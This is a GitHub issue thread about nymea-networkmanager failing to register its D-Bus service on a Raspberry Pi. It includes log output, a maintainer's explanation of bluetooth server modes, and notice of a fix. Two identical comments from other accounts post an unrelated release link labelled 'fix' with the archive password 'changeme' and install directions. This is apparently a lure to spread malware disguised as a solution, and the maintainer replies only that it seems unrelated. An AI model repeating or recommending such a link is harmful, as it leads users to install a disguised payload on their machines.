### ISSUE TITLE
Could not init nymea D-Bus services

### ISSUE THREAD

**Issue by CrabbyPete** [nymea/nymea-networkmanager#63]
I am running the nymea-network manager as service on Raspberry Pi bookworm. I tried to run it using `systemctl start nymea-networkmanager` It does not start the bluetooth service and if I run `journalctl -u nymea-networkmanager` 
I see the following:
`Aug 28 19:58:36 raspberrypi nymea-networkmanager[1737]:  I | Application: DBus interface: "system"

 Aug 28 19:58:36 raspberrypi nymea-networkmanager[1737]:  W | NymeaService: Invalid D-Bus HardwareManager interface.

 Aug 28 19:58:36 raspberrypi nymea-networkmanager[1737]:  W | NymeaService: Could not init nymea D-Bus services

 Aug 28 19:58:36 raspberrypi nymea-networkmanager[1737]:  W | DBus: Failed to register D-Bus service.
`

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by t-mon** [comment]
@CrabbyPete the warnings regarding the NymeaService are just warnings and indicate, that the nymea daemon is not running. On bluetooth HCI  version < 4.2 you cannot connect clients while running a bluetooth LE server, therefore the daemon tries to tell nymea to pause all bluetooth communication while the server is running. If you are not using nymea, you can ignore those warnings.

> Aug 28 19:58:36 raspberrypi nymea-networkmanager[1737]: W | DBus: Failed to register D-Bus service.

This line is actually a bug I'm seeing to and I will check what the issue is.

This dbus interface would allow you to start and stop the bluetooth server using dbus method call, but you can also start it in different ways, depending on the mode you configure in the `/etc/nymea/nymea-networkmanager.conf`

Have a look at the `nymea-networkmanager --help` output:

```
Modes: 
  - offline  This mode starts the bluetooth server once the device is offline
             and not connected to any LAN network.
  - once     This mode starts the bluetooth server only if no network configuration exists.
             Once a network connection exists the server will never start again.
  - button   This mode enables the bluetooth server when a GPIO button has been pressed for
             the configured timeout periode.
  - always   This mode enables the bluetooth server as long the application is running.
  - start    This mode starts the bluetooth server for 3 minutes on start and shuts down after a connection.
```

**Comment by t-mon** [comment]
@Amrithesh-k this seems to be unrelated.

**Comment by CrabbyPete** [comment]
Thank you.

**Comment by CrabbyPete** [comment]
I am looking at journalctl and I see this 

`Aug 29 18:18:42 raspberrypi nymea-networkmanager[10547]:  I | Application: Bluetooth client connected
Aug 29 18:18:42 raspberrypi nymea-networkmanager[10547]:  W | qt.bluetooth.bluez: sending error response; request: 16 handle: 53 code: 10
Aug 29 18:18:42 raspberrypi nymea-networkmanager[10547]:  W | qt.bluetooth.bluez: sending error response; request: 8 handle: 1 code: 10
Aug 29 18:18:42 raspberrypi nymea-networkmanager[10547]:  W | qt.bluetooth.bluez: sending error response; request: 8 handle: 26 code: 10
Aug 29 18:18:42 raspberrypi nymea-networkmanager[10547]:  W | qt.bluetooth.bluez: sending error response; request: 8 handle: 39 code: 10`

and bluetooth is not showing up. I made the changes but its still not coming up

**Comment by t-mon** [comment]
The not working dbus interface has been fixen in #64 
Also the documentation has been updated on how to use it. This will be added to the next release.
If it is not working for you, feel free to re-open the issue.
